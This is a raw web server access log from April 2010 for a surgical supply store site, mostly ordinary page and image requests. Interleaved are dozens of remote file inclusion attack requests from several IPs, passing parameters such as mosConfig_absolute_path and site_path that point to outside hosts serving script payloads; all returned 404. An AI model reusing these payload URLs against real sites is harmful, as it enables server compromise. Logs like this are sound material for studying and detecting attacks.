131.158.223.4 - - [07/Apr/2010:07:35:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:35:55 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
96.252.163.69 - - [07/Apr/2010:07:36:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:16 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37791 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:18 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
96.252.163.69 - - [07/Apr/2010:07:36:19 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
172.16.1.180 - - [07/Apr/2010:07:36:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:36:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [07/Apr/2010:07:36:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
95.108.128.242 - - [07/Apr/2010:07:36:19 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c2.jpg.mno HTTP/1.1" 200 265 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.251.197.130 - - [07/Apr/2010:07:36:22 -0400] "GET /logs/access_log.Q109101400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:22 -0400] "GET /logs/access_log.Q109113000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
131.158.223.4 - - [07/Apr/2010:07:36:22 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
125.251.197.130 - - [07/Apr/2010:07:36:22 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:22 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.88.4.74 - - [07/Apr/2010:07:36:30 -0400] "GET /logs/access_log.Q110030500/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:34 -0400] "GET /logs/access_log.Q109113000%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:34 -0400] "GET /logs/access_log.Q109101400%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:34 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.197.130 - - [07/Apr/2010:07:36:35 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.88.4.74 - - [07/Apr/2010:07:36:37 -0400] "GET /logs/access_log.Q110020700/components/com_fabrik/libs/Blowfish.php?mosConfig_absolute_path=http://ezt.cz/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
96.252.163.69 - - [07/Apr/2010:07:36:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0239F65F5B7932002226011+M37+ENG HTTP/1.1" 200 36405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
89.149.241.209 - - [07/Apr/2010:07:36:59 -0400] "GET /logs/error_log.Q110031300%20%20//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:36:59 -0400] "GET //directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:36:59 -0400] "GET /logs//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:37:12 -0400] "GET /logs/access_log.Q109100100/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:37:12 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:37:12 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:50 -0400] "GET //include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:37:50 -0400] "GET /logs/error_log.Q109100100/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:51 -0400] "GET /logs/error_log.Q109100900%20%20//include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:37:51 -0400] "GET /logs//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:37:51 -0400] "GET //directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:37:52 -0400] "GET /logs/error_log.Q110031300//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:55 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:56 -0400] "GET /logs/access_log.Q110032100%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:37:56 -0400] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:38:00 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:38:00 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:38:00 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:05 -0400] "GET /logs/access_log.Q109081500%20%20//include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:10 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:11 -0400] "GET /logs/access_log.Q110032100%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:11 -0400] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:38:13 -0400] "GET /logs/error_log.Q110010700//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:26 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:27 -0400] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:38:27 -0400] "GET /logs/access_log.Q110032100%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
131.158.223.4 - - [07/Apr/2010:07:38:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:38:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.239.124.204 - - [07/Apr/2010:07:38:46 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:38:46 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:38:46 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:07:39:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.241.209 - - [07/Apr/2010:07:39:05 -0400] "GET /logs/error_log.Q110010700%20%20//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:39:30 -0400] "GET /logs/error_log.Q109100900%20%20//include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:39:43 -0400] "GET /logs/error_log.Q109100900%20%20//include/bbs.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:40:03 -0400] "GET //directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:40:03 -0400] "GET /logs//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:40:06 -0400] "GET /logs/access_log.Q110010700//directory/target/link_main.php?phpbb_rooth_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:40:21 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.jpg.mno HTTP/1.1" 200 265 "-" "Yandex/1.01.001 (compatible; Win16; I)"
216.121.63.153 - - [07/Apr/2010:07:40:33 -0400] "GET /logs/access_log.Q110020600%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:41:13 -0400] "GET /logs/error_log.Q109081100%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:41:28 -0400] "GET /logs/error_log.Q109081100%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
